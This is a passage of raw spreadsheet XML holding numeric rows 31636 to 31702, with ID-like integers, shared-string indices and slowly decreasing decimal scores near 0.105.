        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31636" ht="15.75" customHeight="1">
      <c r="A31636" s="1">
        <v>6958.0</v>
      </c>
      <c r="B31636" s="2">
        <v>4.9979785E7</v>
      </c>
      <c r="C31636" s="2" t="s">
        <v>30426</v>
      </c>
      <c r="D31636" s="2">
        <v>1.0</v>
      </c>
      <c r="E31636" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31636" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31637" ht="15.75" customHeight="1">
      <c r="A31637" s="1">
        <v>14372.0</v>
      </c>
      <c r="B31637" s="2">
        <v>3.8978544E7</v>
      </c>
      <c r="C31637" s="2" t="s">
        <v>30427</v>
      </c>
      <c r="D31637" s="2">
        <v>1.0</v>
      </c>
      <c r="E31637" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31637" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31638" ht="15.75" customHeight="1">
      <c r="A31638" s="1">
        <v>14435.0</v>
      </c>
      <c r="B31638" s="2">
        <v>3.9283289E7</v>
      </c>
      <c r="C31638" s="2" t="s">
        <v>30428</v>
      </c>
      <c r="D31638" s="2">
        <v>1.0</v>
      </c>
      <c r="E31638" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31638" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31639" ht="15.75" customHeight="1">
      <c r="A31639" s="1">
        <v>15508.0</v>
      </c>
      <c r="B31639" s="2">
        <v>4.324751E7</v>
      </c>
      <c r="C31639" s="2" t="s">
        <v>30429</v>
      </c>
      <c r="D31639" s="2">
        <v>1.0</v>
      </c>
      <c r="E31639" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31639" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31640" ht="15.75" customHeight="1">
      <c r="A31640" s="1">
        <v>16706.0</v>
      </c>
      <c r="B31640" s="2">
        <v>4.7417133E7</v>
      </c>
      <c r="C31640" s="2" t="s">
        <v>30430</v>
      </c>
      <c r="D31640" s="2">
        <v>1.0</v>
      </c>
      <c r="E31640" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31640" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31641" ht="15.75" customHeight="1">
      <c r="A31641" s="1">
        <v>21529.0</v>
      </c>
      <c r="B31641" s="2">
        <v>2.3427676E7</v>
      </c>
      <c r="C31641" s="2" t="s">
        <v>30431</v>
      </c>
      <c r="D31641" s="2">
        <v>1.0</v>
      </c>
      <c r="E31641" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31641" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31642" ht="15.75" customHeight="1">
      <c r="A31642" s="1">
        <v>21733.0</v>
      </c>
      <c r="B31642" s="2">
        <v>2.5731168E7</v>
      </c>
      <c r="C31642" s="2" t="s">
        <v>30432</v>
      </c>
      <c r="D31642" s="2">
        <v>1.0</v>
      </c>
      <c r="E31642" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31642" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31643" ht="15.75" customHeight="1">
      <c r="A31643" s="1">
        <v>27855.0</v>
      </c>
      <c r="B31643" s="2">
        <v>2.3427675E7</v>
      </c>
      <c r="C31643" s="2" t="s">
        <v>30431</v>
      </c>
      <c r="D31643" s="2">
        <v>1.0</v>
      </c>
      <c r="E31643" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31643" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31644" ht="15.75" customHeight="1">
      <c r="A31644" s="1">
        <v>33175.0</v>
      </c>
      <c r="B31644" s="2">
        <v>7086250.0</v>
      </c>
      <c r="C31644" s="2" t="s">
        <v>30433</v>
      </c>
      <c r="D31644" s="2">
        <v>1.0</v>
      </c>
      <c r="E31644" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31644" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31645" ht="15.75" customHeight="1">
      <c r="A31645" s="1">
        <v>28494.0</v>
      </c>
      <c r="B31645" s="2">
        <v>2.668622E7</v>
      </c>
      <c r="C31645" s="2" t="s">
        <v>30434</v>
      </c>
      <c r="D31645" s="2">
        <v>1.0</v>
      </c>
      <c r="E31645" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31645" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="31646" ht="15.75" customHeight="1">
      <c r="A31646" s="1">
        <v>170.0</v>
      </c>
      <c r="B31646" s="2">
        <v>1.3800126E7</v>
      </c>
      <c r="C31646" s="2" t="s">
        <v>30435</v>
      </c>
      <c r="D31646" s="2">
        <v>1.0</v>
      </c>
      <c r="E31646" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31646" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31647" ht="15.75" customHeight="1">
      <c r="A31647" s="1">
        <v>6861.0</v>
      </c>
      <c r="B31647" s="2">
        <v>4.9677385E7</v>
      </c>
      <c r="C31647" s="2" t="s">
        <v>30436</v>
      </c>
      <c r="D31647" s="2">
        <v>1.0</v>
      </c>
      <c r="E31647" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31647" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31648" ht="15.75" customHeight="1">
      <c r="A31648" s="1">
        <v>9238.0</v>
      </c>
      <c r="B31648" s="2">
        <v>5.5465936E7</v>
      </c>
      <c r="C31648" s="2" t="s">
        <v>30437</v>
      </c>
      <c r="D31648" s="2">
        <v>1.0</v>
      </c>
      <c r="E31648" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31648" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31649" ht="15.75" customHeight="1">
      <c r="A31649" s="1">
        <v>10715.0</v>
      </c>
      <c r="B31649" s="2">
        <v>1.5033573E7</v>
      </c>
      <c r="C31649" s="2" t="s">
        <v>30438</v>
      </c>
      <c r="D31649" s="2">
        <v>1.0</v>
      </c>
      <c r="E31649" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31649" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31650" ht="15.75" customHeight="1">
      <c r="A31650" s="1">
        <v>13908.0</v>
      </c>
      <c r="B31650" s="2">
        <v>3.7094364E7</v>
      </c>
      <c r="C31650" s="2" t="s">
        <v>30439</v>
      </c>
      <c r="D31650" s="2">
        <v>1.0</v>
      </c>
      <c r="E31650" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31650" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31651" ht="15.75" customHeight="1">
      <c r="A31651" s="1">
        <v>28983.0</v>
      </c>
      <c r="B31651" s="2">
        <v>2.982126E7</v>
      </c>
      <c r="C31651" s="2" t="s">
        <v>30440</v>
      </c>
      <c r="D31651" s="2">
        <v>1.0</v>
      </c>
      <c r="E31651" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31651" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="31652" ht="15.75" customHeight="1">
      <c r="A31652" s="1">
        <v>225.0</v>
      </c>
      <c r="B31652" s="2">
        <v>1.4670543E7</v>
      </c>
      <c r="C31652" s="2" t="s">
        <v>30441</v>
      </c>
      <c r="D31652" s="2">
        <v>1.0</v>
      </c>
      <c r="E31652" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31652" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31653" ht="15.75" customHeight="1">
      <c r="A31653" s="1">
        <v>686.0</v>
      </c>
      <c r="B31653" s="2">
        <v>2.032744E7</v>
      </c>
      <c r="C31653" s="2" t="s">
        <v>30442</v>
      </c>
      <c r="D31653" s="2">
        <v>1.0</v>
      </c>
      <c r="E31653" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31653" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31654" ht="15.75" customHeight="1">
      <c r="A31654" s="1">
        <v>2394.0</v>
      </c>
      <c r="B31654" s="2">
        <v>3.33585E7</v>
      </c>
      <c r="C31654" s="2" t="s">
        <v>30443</v>
      </c>
      <c r="D31654" s="2">
        <v>1.0</v>
      </c>
      <c r="E31654" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31654" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31655" ht="15.75" customHeight="1">
      <c r="A31655" s="1">
        <v>11082.0</v>
      </c>
      <c r="B31655" s="2">
        <v>1.8441616E7</v>
      </c>
      <c r="C31655" s="2" t="s">
        <v>30444</v>
      </c>
      <c r="D31655" s="2">
        <v>1.0</v>
      </c>
      <c r="E31655" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31655" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31656" ht="15.75" customHeight="1">
      <c r="A31656" s="1">
        <v>11502.0</v>
      </c>
      <c r="B31656" s="2">
        <v>2.2107959E7</v>
      </c>
      <c r="C31656" s="2" t="s">
        <v>30445</v>
      </c>
      <c r="D31656" s="2">
        <v>1.0</v>
      </c>
      <c r="E31656" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31656" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31657" ht="15.75" customHeight="1">
      <c r="A31657" s="1">
        <v>14946.0</v>
      </c>
      <c r="B31657" s="2">
        <v>4.1277744E7</v>
      </c>
      <c r="C31657" s="2" t="s">
        <v>30446</v>
      </c>
      <c r="D31657" s="2">
        <v>1.0</v>
      </c>
      <c r="E31657" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31657" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31658" ht="15.75" customHeight="1">
      <c r="A31658" s="1">
        <v>16867.0</v>
      </c>
      <c r="B31658" s="2">
        <v>4.795367E7</v>
      </c>
      <c r="C31658" s="2" t="s">
        <v>30447</v>
      </c>
      <c r="D31658" s="2">
        <v>1.0</v>
      </c>
      <c r="E31658" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31658" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31659" ht="15.75" customHeight="1">
      <c r="A31659" s="1">
        <v>19913.0</v>
      </c>
      <c r="B31659" s="2">
        <v>5.7368322E7</v>
      </c>
      <c r="C31659" s="2" t="s">
        <v>30448</v>
      </c>
      <c r="D31659" s="2">
        <v>1.0</v>
      </c>
      <c r="E31659" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31659" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="31660" ht="15.75" customHeight="1">
      <c r="A31660" s="1">
        <v>1140.0</v>
      </c>
      <c r="B31660" s="2">
        <v>2.4251243E7</v>
      </c>
      <c r="C31660" s="2" t="s">
        <v>30449</v>
      </c>
      <c r="D31660" s="2">
        <v>1.0</v>
      </c>
      <c r="E31660" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31660" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31661" ht="15.75" customHeight="1">
      <c r="A31661" s="1">
        <v>2162.0</v>
      </c>
      <c r="B31661" s="2">
        <v>3.1756659E7</v>
      </c>
      <c r="C31661" s="2" t="s">
        <v>30450</v>
      </c>
      <c r="D31661" s="2">
        <v>1.0</v>
      </c>
      <c r="E31661" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31661" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31662" ht="15.75" customHeight="1">
      <c r="A31662" s="1">
        <v>2701.0</v>
      </c>
      <c r="B31662" s="2">
        <v>3.4853902E7</v>
      </c>
      <c r="C31662" s="2" t="s">
        <v>30451</v>
      </c>
      <c r="D31662" s="2">
        <v>1.0</v>
      </c>
      <c r="E31662" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31662" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31663" ht="15.75" customHeight="1">
      <c r="A31663" s="1">
        <v>4831.0</v>
      </c>
      <c r="B31663" s="2">
        <v>4.3663656E7</v>
      </c>
      <c r="C31663" s="2" t="s">
        <v>30452</v>
      </c>
      <c r="D31663" s="2">
        <v>1.0</v>
      </c>
      <c r="E31663" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31663" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31664" ht="15.75" customHeight="1">
      <c r="A31664" s="1">
        <v>6731.0</v>
      </c>
      <c r="B31664" s="2">
        <v>4.9317551E7</v>
      </c>
      <c r="C31664" s="2" t="s">
        <v>30453</v>
      </c>
      <c r="D31664" s="2">
        <v>1.0</v>
      </c>
      <c r="E31664" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31664" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31665" ht="15.75" customHeight="1">
      <c r="A31665" s="1">
        <v>11066.0</v>
      </c>
      <c r="B31665" s="2">
        <v>1.8253598E7</v>
      </c>
      <c r="C31665" s="2" t="s">
        <v>30454</v>
      </c>
      <c r="D31665" s="2">
        <v>1.0</v>
      </c>
      <c r="E31665" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31665" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31666" ht="15.75" customHeight="1">
      <c r="A31666" s="1">
        <v>14048.0</v>
      </c>
      <c r="B31666" s="2">
        <v>3.7509965E7</v>
      </c>
      <c r="C31666" s="2" t="s">
        <v>30455</v>
      </c>
      <c r="D31666" s="2">
        <v>1.0</v>
      </c>
      <c r="E31666" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31666" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="31667" ht="15.75" customHeight="1">
      <c r="A31667" s="1">
        <v>13841.0</v>
      </c>
      <c r="B31667" s="2">
        <v>3.6826547E7</v>
      </c>
      <c r="C31667" s="2" t="s">
        <v>30456</v>
      </c>
      <c r="D31667" s="2">
        <v>1.0</v>
      </c>
      <c r="E31667" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31667" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="31668" ht="15.75" customHeight="1">
      <c r="A31668" s="1">
        <v>17049.0</v>
      </c>
      <c r="B31668" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C31668" s="2" t="s">
        <v>30457</v>
      </c>
      <c r="D31668" s="2">
        <v>1.0</v>
      </c>
      <c r="E31668" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31668" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="31669" ht="15.75" customHeight="1">
      <c r="A31669" s="1">
        <v>18702.0</v>
      </c>
      <c r="B31669" s="2">
        <v>5.3628397E7</v>
      </c>
      <c r="C31669" s="2" t="s">
        <v>30458</v>
      </c>
      <c r="D31669" s="2">
        <v>1.0</v>
      </c>
      <c r="E31669" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31669" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="31670" ht="15.75" customHeight="1">
      <c r="A31670" s="1">
        <v>33795.0</v>
      </c>
      <c r="B31670" s="2">
        <v>8777035.0</v>
      </c>
      <c r="C31670" s="2" t="s">
        <v>29565</v>
      </c>
      <c r="D31670" s="2">
        <v>1.0</v>
      </c>
      <c r="E31670" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31670" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="31671" ht="15.75" customHeight="1">
      <c r="A31671" s="1">
        <v>23138.0</v>
      </c>
      <c r="B31671" s="2">
        <v>5.1573208E7</v>
      </c>
      <c r="C31671" s="2" t="s">
        <v>30459</v>
      </c>
      <c r="D31671" s="2">
        <v>1.0</v>
      </c>
      <c r="E31671" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31671" s="2">
        <v>0.1049382716049383</v>
      </c>
    </row>
    <row r="31672" ht="15.75" customHeight="1">
      <c r="A31672" s="1">
        <v>12232.0</v>
      </c>
      <c r="B31672" s="2">
        <v>2.7862374E7</v>
      </c>
      <c r="C31672" s="2" t="s">
        <v>30460</v>
      </c>
      <c r="D31672" s="2">
        <v>1.0</v>
      </c>
      <c r="E31672" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31672" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="31673" ht="15.75" customHeight="1">
      <c r="A31673" s="1">
        <v>31078.0</v>
      </c>
      <c r="B31673" s="2">
        <v>4.8324252E7</v>
      </c>
      <c r="C31673" s="2" t="s">
        <v>30461</v>
      </c>
      <c r="D31673" s="2">
        <v>1.0</v>
      </c>
      <c r="E31673" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31673" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="31674" ht="15.75" customHeight="1">
      <c r="A31674" s="1">
        <v>18329.0</v>
      </c>
      <c r="B31674" s="2">
        <v>5.2407775E7</v>
      </c>
      <c r="C31674" s="2" t="s">
        <v>30462</v>
      </c>
      <c r="D31674" s="2">
        <v>1.0</v>
      </c>
      <c r="E31674" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31674" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="31675" ht="15.75" customHeight="1">
      <c r="A31675" s="1">
        <v>26203.0</v>
      </c>
      <c r="B31675" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C31675" s="2" t="s">
        <v>30463</v>
      </c>
      <c r="D31675" s="2">
        <v>1.0</v>
      </c>
      <c r="E31675" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31675" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="31676" ht="15.75" customHeight="1">
      <c r="A31676" s="1">
        <v>33285.0</v>
      </c>
      <c r="B31676" s="2">
        <v>7451902.0</v>
      </c>
      <c r="C31676" s="2" t="s">
        <v>30464</v>
      </c>
      <c r="D31676" s="2">
        <v>1.0</v>
      </c>
      <c r="E31676" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31676" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="31677" ht="15.75" customHeight="1">
      <c r="A31677" s="1">
        <v>7416.0</v>
      </c>
      <c r="B31677" s="2">
        <v>5.1142982E7</v>
      </c>
      <c r="C31677" s="2" t="s">
        <v>30465</v>
      </c>
      <c r="D31677" s="2">
        <v>1.0</v>
      </c>
      <c r="E31677" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31677" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31678" ht="15.75" customHeight="1">
      <c r="A31678" s="1">
        <v>11552.0</v>
      </c>
      <c r="B31678" s="2">
        <v>2.2699631E7</v>
      </c>
      <c r="C31678" s="2" t="s">
        <v>30466</v>
      </c>
      <c r="D31678" s="2">
        <v>1.0</v>
      </c>
      <c r="E31678" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31678" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31679" ht="15.75" customHeight="1">
      <c r="A31679" s="1">
        <v>12561.0</v>
      </c>
      <c r="B31679" s="2">
        <v>2.9917496E7</v>
      </c>
      <c r="C31679" s="2" t="s">
        <v>30467</v>
      </c>
      <c r="D31679" s="2">
        <v>1.0</v>
      </c>
      <c r="E31679" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31679" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31680" ht="15.75" customHeight="1">
      <c r="A31680" s="1">
        <v>13093.0</v>
      </c>
      <c r="B31680" s="2">
        <v>3.3457411E7</v>
      </c>
      <c r="C31680" s="2" t="s">
        <v>30468</v>
      </c>
      <c r="D31680" s="2">
        <v>1.0</v>
      </c>
      <c r="E31680" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31680" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31681" ht="15.75" customHeight="1">
      <c r="A31681" s="1">
        <v>14689.0</v>
      </c>
      <c r="B31681" s="2">
        <v>4.05344E7</v>
      </c>
      <c r="C31681" s="2" t="s">
        <v>30469</v>
      </c>
      <c r="D31681" s="2">
        <v>1.0</v>
      </c>
      <c r="E31681" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31681" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31682" ht="15.75" customHeight="1">
      <c r="A31682" s="1">
        <v>19824.0</v>
      </c>
      <c r="B31682" s="2">
        <v>5.7020643E7</v>
      </c>
      <c r="C31682" s="2" t="s">
        <v>30470</v>
      </c>
      <c r="D31682" s="2">
        <v>1.0</v>
      </c>
      <c r="E31682" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31682" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31683" ht="15.75" customHeight="1">
      <c r="A31683" s="1">
        <v>28533.0</v>
      </c>
      <c r="B31683" s="2">
        <v>2.6794396E7</v>
      </c>
      <c r="C31683" s="2" t="s">
        <v>30471</v>
      </c>
      <c r="D31683" s="2">
        <v>1.0</v>
      </c>
      <c r="E31683" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31683" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31684" ht="15.75" customHeight="1">
      <c r="A31684" s="1">
        <v>31875.0</v>
      </c>
      <c r="B31684" s="2">
        <v>5286062.0</v>
      </c>
      <c r="C31684" s="2" t="s">
        <v>30472</v>
      </c>
      <c r="D31684" s="2">
        <v>1.0</v>
      </c>
      <c r="E31684" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31684" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="31685" ht="15.75" customHeight="1">
      <c r="A31685" s="1">
        <v>2950.0</v>
      </c>
      <c r="B31685" s="2">
        <v>3.6003491E7</v>
      </c>
      <c r="C31685" s="2" t="s">
        <v>30473</v>
      </c>
      <c r="D31685" s="2">
        <v>1.0</v>
      </c>
      <c r="E31685" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31685" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31686" ht="15.75" customHeight="1">
      <c r="A31686" s="1">
        <v>3179.0</v>
      </c>
      <c r="B31686" s="2">
        <v>3.7098019E7</v>
      </c>
      <c r="C31686" s="2" t="s">
        <v>30474</v>
      </c>
      <c r="D31686" s="2">
        <v>1.0</v>
      </c>
      <c r="E31686" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31686" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31687" ht="15.75" customHeight="1">
      <c r="A31687" s="1">
        <v>3281.0</v>
      </c>
      <c r="B31687" s="2">
        <v>3.7496419E7</v>
      </c>
      <c r="C31687" s="2" t="s">
        <v>30475</v>
      </c>
      <c r="D31687" s="2">
        <v>1.0</v>
      </c>
      <c r="E31687" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31687" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31688" ht="15.75" customHeight="1">
      <c r="A31688" s="1">
        <v>4193.0</v>
      </c>
      <c r="B31688" s="2">
        <v>4.1603873E7</v>
      </c>
      <c r="C31688" s="2" t="s">
        <v>30476</v>
      </c>
      <c r="D31688" s="2">
        <v>1.0</v>
      </c>
      <c r="E31688" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31688" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31689" ht="15.75" customHeight="1">
      <c r="A31689" s="1">
        <v>4473.0</v>
      </c>
      <c r="B31689" s="2">
        <v>4.2475546E7</v>
      </c>
      <c r="C31689" s="2" t="s">
        <v>30477</v>
      </c>
      <c r="D31689" s="2">
        <v>1.0</v>
      </c>
      <c r="E31689" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31689" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31690" ht="15.75" customHeight="1">
      <c r="A31690" s="1">
        <v>6866.0</v>
      </c>
      <c r="B31690" s="2">
        <v>4.9682777E7</v>
      </c>
      <c r="C31690" s="2" t="s">
        <v>30478</v>
      </c>
      <c r="D31690" s="2">
        <v>1.0</v>
      </c>
      <c r="E31690" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31690" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31691" ht="15.75" customHeight="1">
      <c r="A31691" s="1">
        <v>7490.0</v>
      </c>
      <c r="B31691" s="2">
        <v>5.1375017E7</v>
      </c>
      <c r="C31691" s="2" t="s">
        <v>30479</v>
      </c>
      <c r="D31691" s="2">
        <v>1.0</v>
      </c>
      <c r="E31691" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31691" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31692" ht="15.75" customHeight="1">
      <c r="A31692" s="1">
        <v>7749.0</v>
      </c>
      <c r="B31692" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C31692" s="2" t="s">
        <v>30480</v>
      </c>
      <c r="D31692" s="2">
        <v>1.0</v>
      </c>
      <c r="E31692" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31692" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31693" ht="15.75" customHeight="1">
      <c r="A31693" s="1">
        <v>8081.0</v>
      </c>
      <c r="B31693" s="2">
        <v>5.3030564E7</v>
      </c>
      <c r="C31693" s="2" t="s">
        <v>30481</v>
      </c>
      <c r="D31693" s="2">
        <v>1.0</v>
      </c>
      <c r="E31693" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31693" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31694" ht="15.75" customHeight="1">
      <c r="A31694" s="1">
        <v>8327.0</v>
      </c>
      <c r="B31694" s="2">
        <v>5.3643821E7</v>
      </c>
      <c r="C31694" s="2" t="s">
        <v>30482</v>
      </c>
      <c r="D31694" s="2">
        <v>1.0</v>
      </c>
      <c r="E31694" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31694" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31695" ht="15.75" customHeight="1">
      <c r="A31695" s="1">
        <v>8659.0</v>
      </c>
      <c r="B31695" s="2">
        <v>5.4354104E7</v>
      </c>
      <c r="C31695" s="2" t="s">
        <v>30483</v>
      </c>
      <c r="D31695" s="2">
        <v>1.0</v>
      </c>
      <c r="E31695" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31695" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31696" ht="15.75" customHeight="1">
      <c r="A31696" s="1">
        <v>8803.0</v>
      </c>
      <c r="B31696" s="2">
        <v>5.4612686E7</v>
      </c>
      <c r="C31696" s="2" t="s">
        <v>30484</v>
      </c>
      <c r="D31696" s="2">
        <v>1.0</v>
      </c>
      <c r="E31696" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31696" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31697" ht="15.75" customHeight="1">
      <c r="A31697" s="1">
        <v>10661.0</v>
      </c>
      <c r="B31697" s="2">
        <v>1.4241397E7</v>
      </c>
      <c r="C31697" s="2" t="s">
        <v>30485</v>
      </c>
      <c r="D31697" s="2">
        <v>1.0</v>
      </c>
      <c r="E31697" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31697" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31698" ht="15.75" customHeight="1">
      <c r="A31698" s="1">
        <v>11006.0</v>
      </c>
      <c r="B31698" s="2">
        <v>1.7676983E7</v>
      </c>
      <c r="C31698" s="2" t="s">
        <v>30486</v>
      </c>
      <c r="D31698" s="2">
        <v>1.0</v>
      </c>
      <c r="E31698" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31698" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31699" ht="15.75" customHeight="1">
      <c r="A31699" s="1">
        <v>11603.0</v>
      </c>
      <c r="B31699" s="2">
        <v>2.3006052E7</v>
      </c>
      <c r="C31699" s="2" t="s">
        <v>30487</v>
      </c>
      <c r="D31699" s="2">
        <v>1.0</v>
      </c>
      <c r="E31699" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31699" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31700" ht="15.75" customHeight="1">
      <c r="A31700" s="1">
        <v>11698.0</v>
      </c>
      <c r="B31700" s="2">
        <v>2.3479052E7</v>
      </c>
      <c r="C31700" s="2" t="s">
        <v>30488</v>
      </c>
      <c r="D31700" s="2">
        <v>1.0</v>
      </c>
      <c r="E31700" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31700" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31701" ht="15.75" customHeight="1">
      <c r="A31701" s="1">
        <v>12096.0</v>
      </c>
      <c r="B31701" s="2">
        <v>2.6735492E7</v>
      </c>
      <c r="C31701" s="2" t="s">
        <v>30489</v>
      </c>
      <c r="D31701" s="2">
        <v>1.0</v>
      </c>
      <c r="E31701" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31701" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31702" ht="15.75" customHeight="1">
      <c r="A31702" s="1">
        <v>13298.0</v>
      </c>
      <c r="B31702" s="2">
        <v>3.4483441E7</v>
      </c>
      <c r="C31702" s="2" t="s">
        <v>30490</v>
      </c>
      <c r="D31702" s="2">
        <v>1.0</v>
      </c>
      <c r="E31702" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31702" s="2">
        <v>0.1045197740112994</v>
